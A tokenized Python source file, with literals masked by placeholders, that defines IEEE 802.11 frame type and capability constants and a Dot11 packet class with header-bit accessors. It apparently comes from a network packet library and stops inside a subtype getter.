<s> import struct <EOL> import string <EOL> from binascii import crc32 <EOL> from ImpactPacket import ProtocolPacket <EOL> from Dot11Crypto import RC4 <EOL> frequency = { <EOL> <NUM_LIT> : <NUM_LIT:1> , <NUM_LIT> : <NUM_LIT:2> , <NUM_LIT> : <NUM_LIT:3> , <NUM_LIT> : <NUM_LIT:4> , <NUM_LIT> : <NUM_LIT:5> , <NUM_LIT> : <NUM_LIT:6> , <NUM_LIT> : <NUM_LIT:7> , <NUM_LIT> : <NUM_LIT:8> , <NUM_LIT> : <NUM_LIT:9> , <EOL> <NUM_LIT> : <NUM_LIT:10> , <NUM_LIT> : <NUM_LIT:11> , <NUM_LIT> : <NUM_LIT:12> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <EOL> <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT:64> , <NUM_LIT> : <NUM_LIT:100> , <EOL> <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <EOL> <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <EOL> <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <EOL> <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <EOL> <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <NUM_LIT> : <NUM_LIT> , <EOL> } <EOL> class Dot11ManagementCapabilities ( ) : <EOL> CAPABILITY_RESERVED_1 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> CAPABILITY_RESERVED_2 = int ( 
"<STR_LIT>" , <NUM_LIT:2> ) <EOL> CAPABILITY_DSSS_OFDM = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> CAPABILITY_RESERVED_3 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> CAPABILITY_RESERVED_4 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> CAPABILITY_SHORT_SLOT_TIME = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> CAPABILITY_RESERVED_5 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> CAPABILITY_RESERVED_6 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> CAPABILITY_CH_AGILITY = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> CAPABILITY_PBCC = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> CAPABILITY_SHORT_PREAMBLE = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> CAPABILITY_PRIVACY = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> CAPABILITY_CF_POLL_REQ = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> CAPABILITY_CF_POLLABLE = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> CAPABILITY_IBSS = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> CAPABILITY_ESS = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> class Dot11Types ( ) : <EOL> DOT11_TYPE_MANAGEMENT = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_MANAGEMENT_ASSOCIATION_REQUEST = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_MANAGEMENT_ASSOCIATION_RESPONSE = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_MANAGEMENT_REASSOCIATION_REQUEST = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_MANAGEMENT_REASSOCIATION_RESPONSE = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_MANAGEMENT_PROBE_REQUEST = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_MANAGEMENT_PROBE_RESPONSE = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_MANAGEMENT_RESERVED1 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_MANAGEMENT_RESERVED2 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_MANAGEMENT_BEACON = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_MANAGEMENT_ATIM = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_MANAGEMENT_DISASSOCIATION = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_MANAGEMENT_AUTHENTICATION = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> 
DOT11_SUBTYPE_MANAGEMENT_DEAUTHENTICATION = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_MANAGEMENT_ACTION = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_MANAGEMENT_RESERVED3 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_MANAGEMENT_RESERVED4 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_TYPE_MANAGEMENT_SUBTYPE_ASSOCIATION_REQUEST = DOT11_TYPE_MANAGEMENT | DOT11_SUBTYPE_MANAGEMENT_ASSOCIATION_REQUEST << <NUM_LIT:2> <EOL> DOT11_TYPE_MANAGEMENT_SUBTYPE_ASSOCIATION_RESPONSE = DOT11_TYPE_MANAGEMENT | DOT11_SUBTYPE_MANAGEMENT_ASSOCIATION_RESPONSE << <NUM_LIT:2> <EOL> DOT11_TYPE_MANAGEMENT_SUBTYPE_REASSOCIATION_REQUEST = DOT11_TYPE_MANAGEMENT | DOT11_SUBTYPE_MANAGEMENT_REASSOCIATION_REQUEST << <NUM_LIT:2> <EOL> DOT11_TYPE_MANAGEMENT_SUBTYPE_REASSOCIATION_RESPONSE = DOT11_TYPE_MANAGEMENT | DOT11_SUBTYPE_MANAGEMENT_REASSOCIATION_RESPONSE << <NUM_LIT:2> <EOL> DOT11_TYPE_MANAGEMENT_SUBTYPE_PROBE_REQUEST = DOT11_TYPE_MANAGEMENT | DOT11_SUBTYPE_MANAGEMENT_PROBE_REQUEST << <NUM_LIT:2> <EOL> DOT11_TYPE_MANAGEMENT_SUBTYPE_PROBE_RESPONSE = DOT11_TYPE_MANAGEMENT | DOT11_SUBTYPE_MANAGEMENT_PROBE_RESPONSE << <NUM_LIT:2> <EOL> DOT11_TYPE_MANAGEMENT_SUBTYPE_RESERVED1 = DOT11_TYPE_MANAGEMENT | DOT11_SUBTYPE_MANAGEMENT_RESERVED1 << <NUM_LIT:2> <EOL> DOT11_TYPE_MANAGEMENT_SUBTYPE_RESERVED2 = DOT11_TYPE_MANAGEMENT | DOT11_SUBTYPE_MANAGEMENT_RESERVED2 << <NUM_LIT:2> <EOL> DOT11_TYPE_MANAGEMENT_SUBTYPE_BEACON = DOT11_TYPE_MANAGEMENT | DOT11_SUBTYPE_MANAGEMENT_BEACON << <NUM_LIT:2> <EOL> DOT11_TYPE_MANAGEMENT_SUBTYPE_ATIM = DOT11_TYPE_MANAGEMENT | DOT11_SUBTYPE_MANAGEMENT_ATIM << <NUM_LIT:2> <EOL> DOT11_TYPE_MANAGEMENT_SUBTYPE_DISASSOCIATION = DOT11_TYPE_MANAGEMENT | DOT11_SUBTYPE_MANAGEMENT_DISASSOCIATION << <NUM_LIT:2> <EOL> DOT11_TYPE_MANAGEMENT_SUBTYPE_AUTHENTICATION = DOT11_TYPE_MANAGEMENT | DOT11_SUBTYPE_MANAGEMENT_AUTHENTICATION << <NUM_LIT:2> <EOL> DOT11_TYPE_MANAGEMENT_SUBTYPE_DEAUTHENTICATION = DOT11_TYPE_MANAGEMENT | 
DOT11_SUBTYPE_MANAGEMENT_DEAUTHENTICATION << <NUM_LIT:2> <EOL> DOT11_TYPE_MANAGEMENT_SUBTYPE_ACTION = DOT11_TYPE_MANAGEMENT | DOT11_SUBTYPE_MANAGEMENT_ACTION << <NUM_LIT:2> <EOL> DOT11_TYPE_MANAGEMENT_SUBTYPE_RESERVED3 = DOT11_TYPE_MANAGEMENT | DOT11_SUBTYPE_MANAGEMENT_RESERVED3 << <NUM_LIT:2> <EOL> DOT11_TYPE_MANAGEMENT_SUBTYPE_RESERVED4 = DOT11_TYPE_MANAGEMENT | DOT11_SUBTYPE_MANAGEMENT_RESERVED4 << <NUM_LIT:2> <EOL> DOT11_TYPE_CONTROL = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_CONTROL_RESERVED1 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_CONTROL_RESERVED2 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_CONTROL_RESERVED3 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_CONTROL_RESERVED4 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_CONTROL_RESERVED5 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_CONTROL_RESERVED6 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_CONTROL_RESERVED7 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_CONTROL_RESERVED8 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_CONTROL_BLOCK_ACK_REQUEST = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_CONTROL_BLOCK_ACK = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_CONTROL_POWERSAVE_POLL = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_CONTROL_REQUEST_TO_SEND = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_CONTROL_CLEAR_TO_SEND = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_CONTROL_ACKNOWLEDGMENT = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_CONTROL_CF_END = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_CONTROL_CF_END_CF_ACK = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_TYPE_CONTROL_SUBTYPE_RESERVED1 = DOT11_TYPE_CONTROL | DOT11_SUBTYPE_CONTROL_RESERVED1 << <NUM_LIT:2> <EOL> DOT11_TYPE_CONTROL_SUBTYPE_RESERVED2 = DOT11_TYPE_CONTROL | DOT11_SUBTYPE_CONTROL_RESERVED2 << <NUM_LIT:2> <EOL> DOT11_TYPE_CONTROL_SUBTYPE_RESERVED3 = DOT11_TYPE_CONTROL | 
DOT11_SUBTYPE_CONTROL_RESERVED3 << <NUM_LIT:2> <EOL> DOT11_TYPE_CONTROL_SUBTYPE_RESERVED4 = DOT11_TYPE_CONTROL | DOT11_SUBTYPE_CONTROL_RESERVED4 << <NUM_LIT:2> <EOL> DOT11_TYPE_CONTROL_SUBTYPE_RESERVED5 = DOT11_TYPE_CONTROL | DOT11_SUBTYPE_CONTROL_RESERVED5 << <NUM_LIT:2> <EOL> DOT11_TYPE_CONTROL_SUBTYPE_RESERVED6 = DOT11_TYPE_CONTROL | DOT11_SUBTYPE_CONTROL_RESERVED6 << <NUM_LIT:2> <EOL> DOT11_TYPE_CONTROL_SUBTYPE_RESERVED7 = DOT11_TYPE_CONTROL | DOT11_SUBTYPE_CONTROL_RESERVED7 << <NUM_LIT:2> <EOL> DOT11_TYPE_CONTROL_SUBTYPE_BLOCK_ACK_REQUEST = DOT11_TYPE_CONTROL | DOT11_SUBTYPE_CONTROL_BLOCK_ACK_REQUEST << <NUM_LIT:2> <EOL> DOT11_TYPE_CONTROL_SUBTYPE_BLOCK_ACK = DOT11_TYPE_CONTROL | DOT11_SUBTYPE_CONTROL_BLOCK_ACK << <NUM_LIT:2> <EOL> DOT11_TYPE_CONTROL_SUBTYPE_POWERSAVE_POLL = DOT11_TYPE_CONTROL | DOT11_SUBTYPE_CONTROL_POWERSAVE_POLL << <NUM_LIT:2> <EOL> DOT11_TYPE_CONTROL_SUBTYPE_REQUEST_TO_SEND = DOT11_TYPE_CONTROL | DOT11_SUBTYPE_CONTROL_REQUEST_TO_SEND << <NUM_LIT:2> <EOL> DOT11_TYPE_CONTROL_SUBTYPE_CLEAR_TO_SEND = DOT11_TYPE_CONTROL | DOT11_SUBTYPE_CONTROL_CLEAR_TO_SEND << <NUM_LIT:2> <EOL> DOT11_TYPE_CONTROL_SUBTYPE_ACKNOWLEDGMENT = DOT11_TYPE_CONTROL | DOT11_SUBTYPE_CONTROL_ACKNOWLEDGMENT << <NUM_LIT:2> <EOL> DOT11_TYPE_CONTROL_SUBTYPE_CF_END = DOT11_TYPE_CONTROL | DOT11_SUBTYPE_CONTROL_CF_END << <NUM_LIT:2> <EOL> DOT11_TYPE_CONTROL_SUBTYPE_CF_END_CF_ACK = DOT11_TYPE_CONTROL | DOT11_SUBTYPE_CONTROL_CF_END_CF_ACK << <NUM_LIT:2> <EOL> DOT11_TYPE_DATA = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_DATA = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_DATA_CF_ACK = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_DATA_CF_POLL = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_DATA_CF_ACK_CF_POLL = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_DATA_NULL_NO_DATA = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_DATA_CF_ACK_NO_DATA = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_DATA_CF_POLL_NO_DATA = int ( 
"<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_DATA_CF_ACK_CF_POLL_NO_DATA = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_DATA_QOS_DATA = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_DATA_QOS_DATA_CF_ACK = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_DATA_QOS_DATA_CF_POLL = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_DATA_QOS_DATA_CF_ACK_CF_POLL = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_DATA_QOS_NULL_NO_DATA = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_DATA_RESERVED1 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_DATA_QOS_CF_POLL_NO_DATA = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_DATA_QOS_CF_ACK_CF_POLL_NO_DATA = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_TYPE_DATA_SUBTYPE_DATA = DOT11_TYPE_DATA | DOT11_SUBTYPE_DATA << <NUM_LIT:2> <EOL> DOT11_TYPE_DATA_SUBTYPE_CF_ACK = DOT11_TYPE_DATA | DOT11_SUBTYPE_DATA_CF_ACK << <NUM_LIT:2> <EOL> DOT11_TYPE_DATA_SUBTYPE_CF_POLL = DOT11_TYPE_DATA | DOT11_SUBTYPE_DATA_CF_POLL << <NUM_LIT:2> <EOL> DOT11_TYPE_DATA_SUBTYPE_CF_ACK_CF_POLL = DOT11_TYPE_DATA | DOT11_SUBTYPE_DATA_CF_ACK_CF_POLL << <NUM_LIT:2> <EOL> DOT11_TYPE_DATA_SUBTYPE_NULL_NO_DATA = DOT11_TYPE_DATA | DOT11_SUBTYPE_DATA_NULL_NO_DATA << <NUM_LIT:2> <EOL> DOT11_TYPE_DATA_SUBTYPE_CF_ACK_NO_DATA = DOT11_TYPE_DATA | DOT11_SUBTYPE_DATA_CF_POLL_NO_DATA << <NUM_LIT:2> <EOL> DOT11_TYPE_DATA_SUBTYPE_CF_ACK_CF_POLL_NO_DATA = DOT11_TYPE_DATA | DOT11_SUBTYPE_DATA_CF_ACK_CF_POLL_NO_DATA << <NUM_LIT:2> <EOL> DOT11_TYPE_DATA_SUBTYPE_QOS_DATA = DOT11_TYPE_DATA | DOT11_SUBTYPE_DATA_QOS_DATA << <NUM_LIT:2> <EOL> DOT11_TYPE_DATA_SUBTYPE_QOS_DATA_CF_ACK = DOT11_TYPE_DATA | DOT11_SUBTYPE_DATA_QOS_DATA_CF_ACK << <NUM_LIT:2> <EOL> DOT11_TYPE_DATA_SUBTYPE_QOS_DATA_CF_POLL = DOT11_TYPE_DATA | DOT11_SUBTYPE_DATA_QOS_DATA_CF_POLL << <NUM_LIT:2> <EOL> DOT11_TYPE_DATA_SUBTYPE_QOS_DATA_CF_ACK_CF_POLL = DOT11_TYPE_DATA | DOT11_SUBTYPE_DATA_QOS_DATA_CF_ACK_CF_POLL << <NUM_LIT:2> <EOL> 
DOT11_TYPE_DATA_SUBTYPE_QOS_NULL_NO_DATA = DOT11_TYPE_DATA | DOT11_SUBTYPE_DATA_QOS_NULL_NO_DATA << <NUM_LIT:2> <EOL> DOT11_TYPE_DATA_SUBTYPE_RESERVED1 = DOT11_TYPE_DATA | DOT11_SUBTYPE_DATA_RESERVED1 << <NUM_LIT:2> <EOL> DOT11_TYPE_DATA_SUBTYPE_QOS_CF_POLL_NO_DATA = DOT11_TYPE_DATA | DOT11_SUBTYPE_DATA_QOS_CF_POLL_NO_DATA << <NUM_LIT:2> <EOL> DOT11_TYPE_DATA_SUBTYPE_QOS_CF_ACK_CF_POLL_NO_DATA = DOT11_TYPE_DATA | DOT11_SUBTYPE_DATA_QOS_CF_ACK_CF_POLL_NO_DATA << <NUM_LIT:2> <EOL> DOT11_TYPE_RESERVED = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_RESERVED_RESERVED1 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_RESERVED_RESERVED2 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_RESERVED_RESERVED3 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_RESERVED_RESERVED4 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_RESERVED_RESERVED5 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_RESERVED_RESERVED6 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_RESERVED_RESERVED7 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_RESERVED_RESERVED8 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_RESERVED_RESERVED9 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_RESERVED_RESERVED10 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_RESERVED_RESERVED11 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_RESERVED_RESERVED12 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_RESERVED_RESERVED13 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_RESERVED_RESERVED14 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_RESERVED_RESERVED15 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_SUBTYPE_RESERVED_RESERVED16 = int ( "<STR_LIT>" , <NUM_LIT:2> ) <EOL> DOT11_TYPE_RESERVED_SUBTYPE_RESERVED1 = DOT11_TYPE_RESERVED | DOT11_SUBTYPE_RESERVED_RESERVED1 << <NUM_LIT:2> <EOL> DOT11_TYPE_RESERVED_SUBTYPE_RESERVED2 = DOT11_TYPE_RESERVED | DOT11_SUBTYPE_RESERVED_RESERVED2 << <NUM_LIT:2> <EOL> 
DOT11_TYPE_RESERVED_SUBTYPE_RESERVED3 = DOT11_TYPE_RESERVED | DOT11_SUBTYPE_RESERVED_RESERVED3 << <NUM_LIT:2> <EOL> DOT11_TYPE_RESERVED_SUBTYPE_RESERVED4 = DOT11_TYPE_RESERVED | DOT11_SUBTYPE_RESERVED_RESERVED4 << <NUM_LIT:2> <EOL> DOT11_TYPE_RESERVED_SUBTYPE_RESERVED5 = DOT11_TYPE_RESERVED | DOT11_SUBTYPE_RESERVED_RESERVED5 << <NUM_LIT:2> <EOL> DOT11_TYPE_RESERVED_SUBTYPE_RESERVED6 = DOT11_TYPE_RESERVED | DOT11_SUBTYPE_RESERVED_RESERVED6 << <NUM_LIT:2> <EOL> DOT11_TYPE_RESERVED_SUBTYPE_RESERVED7 = DOT11_TYPE_RESERVED | DOT11_SUBTYPE_RESERVED_RESERVED7 << <NUM_LIT:2> <EOL> DOT11_TYPE_RESERVED_SUBTYPE_RESERVED8 = DOT11_TYPE_RESERVED | DOT11_SUBTYPE_RESERVED_RESERVED8 << <NUM_LIT:2> <EOL> DOT11_TYPE_RESERVED_SUBTYPE_RESERVED9 = DOT11_TYPE_RESERVED | DOT11_SUBTYPE_RESERVED_RESERVED9 << <NUM_LIT:2> <EOL> DOT11_TYPE_RESERVED_SUBTYPE_RESERVED10 = DOT11_TYPE_RESERVED | DOT11_SUBTYPE_RESERVED_RESERVED10 << <NUM_LIT:2> <EOL> DOT11_TYPE_RESERVED_SUBTYPE_RESERVED11 = DOT11_TYPE_RESERVED | DOT11_SUBTYPE_RESERVED_RESERVED11 << <NUM_LIT:2> <EOL> DOT11_TYPE_RESERVED_SUBTYPE_RESERVED12 = DOT11_TYPE_RESERVED | DOT11_SUBTYPE_RESERVED_RESERVED12 << <NUM_LIT:2> <EOL> DOT11_TYPE_RESERVED_SUBTYPE_RESERVED13 = DOT11_TYPE_RESERVED | DOT11_SUBTYPE_RESERVED_RESERVED13 << <NUM_LIT:2> <EOL> DOT11_TYPE_RESERVED_SUBTYPE_RESERVED14 = DOT11_TYPE_RESERVED | DOT11_SUBTYPE_RESERVED_RESERVED14 << <NUM_LIT:2> <EOL> DOT11_TYPE_RESERVED_SUBTYPE_RESERVED15 = DOT11_TYPE_RESERVED | DOT11_SUBTYPE_RESERVED_RESERVED15 << <NUM_LIT:2> <EOL> DOT11_TYPE_RESERVED_SUBTYPE_RESERVED16 = DOT11_TYPE_RESERVED | DOT11_SUBTYPE_RESERVED_RESERVED16 << <NUM_LIT:2> <EOL> class Dot11 ( ProtocolPacket ) : <EOL> def __init__ ( self , aBuffer = None , FCS_at_end = True ) : <EOL> header_size = <NUM_LIT:2> <EOL> self . __FCS_at_end = not not FCS_at_end <EOL> if self . __FCS_at_end : <EOL> tail_size = <NUM_LIT:4> <EOL> else : <EOL> tail_size = <NUM_LIT:0> <EOL> ProtocolPacket . 
__init__ ( self , header_size , tail_size ) <EOL> if ( aBuffer ) : <EOL> self . load_packet ( aBuffer ) <EOL> def get_order ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_byte ( <NUM_LIT:1> ) <EOL> return ( ( b >> <NUM_LIT:7> ) & <NUM_LIT> ) <EOL> def set_order ( self , value ) : <EOL> "<STR_LIT>" <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_byte ( <NUM_LIT:1> ) & mask <EOL> nb = masked | ( ( value & <NUM_LIT> ) << <NUM_LIT:7> ) <EOL> self . header . set_byte ( <NUM_LIT:1> , nb ) <EOL> def get_protectedFrame ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_byte ( <NUM_LIT:1> ) <EOL> return ( ( b >> <NUM_LIT:6> ) & <NUM_LIT> ) <EOL> def set_protectedFrame ( self , value ) : <EOL> "<STR_LIT>" <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_byte ( <NUM_LIT:1> ) & mask <EOL> nb = masked | ( ( value & <NUM_LIT> ) << <NUM_LIT:6> ) <EOL> self . header . set_byte ( <NUM_LIT:1> , nb ) <EOL> def get_moreData ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_byte ( <NUM_LIT:1> ) <EOL> return ( ( b >> <NUM_LIT:5> ) & <NUM_LIT> ) <EOL> def set_moreData ( self , value ) : <EOL> "<STR_LIT>" <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_byte ( <NUM_LIT:1> ) & mask <EOL> nb = masked | ( ( value & <NUM_LIT> ) << <NUM_LIT:5> ) <EOL> self . header . set_byte ( <NUM_LIT:1> , nb ) <EOL> def get_powerManagement ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_byte ( <NUM_LIT:1> ) <EOL> return ( ( b >> <NUM_LIT:4> ) & <NUM_LIT> ) <EOL> def set_powerManagement ( self , value ) : <EOL> "<STR_LIT>" <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_byte ( <NUM_LIT:1> ) & mask <EOL> nb = masked | ( ( value & <NUM_LIT> ) << <NUM_LIT:4> ) <EOL> self . header . set_byte ( <NUM_LIT:1> , nb ) <EOL> def get_retry ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . 
get_byte ( <NUM_LIT:1> ) <EOL> return ( ( b >> <NUM_LIT:3> ) & <NUM_LIT> ) <EOL> def set_retry ( self , value ) : <EOL> "<STR_LIT>" <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_byte ( <NUM_LIT:1> ) & mask <EOL> nb = masked | ( ( value & <NUM_LIT> ) << <NUM_LIT:3> ) <EOL> self . header . set_byte ( <NUM_LIT:1> , nb ) <EOL> def get_moreFrag ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_byte ( <NUM_LIT:1> ) <EOL> return ( ( b >> <NUM_LIT:2> ) & <NUM_LIT> ) <EOL> def set_moreFrag ( self , value ) : <EOL> "<STR_LIT>" <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_byte ( <NUM_LIT:1> ) & mask <EOL> nb = masked | ( ( value & <NUM_LIT> ) << <NUM_LIT:2> ) <EOL> self . header . set_byte ( <NUM_LIT:1> , nb ) <EOL> def get_fromDS ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_byte ( <NUM_LIT:1> ) <EOL> return ( ( b >> <NUM_LIT:1> ) & <NUM_LIT> ) <EOL> def set_fromDS ( self , value ) : <EOL> "<STR_LIT>" <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_byte ( <NUM_LIT:1> ) & mask <EOL> nb = masked | ( ( value & <NUM_LIT> ) << <NUM_LIT:1> ) <EOL> self . header . set_byte ( <NUM_LIT:1> , nb ) <EOL> def get_toDS ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_byte ( <NUM_LIT:1> ) <EOL> return ( b & <NUM_LIT> ) <EOL> def set_toDS ( self , value ) : <EOL> "<STR_LIT>" <EOL> mask = ( ~ <NUM_LIT> ) & <NUM_LIT> <EOL> masked = self . header . get_byte ( <NUM_LIT:1> ) & mask <EOL> nb = masked | ( value & <NUM_LIT> ) <EOL> self . header . set_byte ( <NUM_LIT:1> , nb ) <EOL> # Type / subtype fields live in header byte 0 ; subtype occupies the high nibble <EOL> def get_subtype ( self ) : <EOL> "<STR_LIT>" <EOL> b = self . header . get_byte ( <NUM_LIT:0> ) <EOL> return ( ( b >> <NUM_LIT:4> ) & <NUM_LIT> ) <EOL> 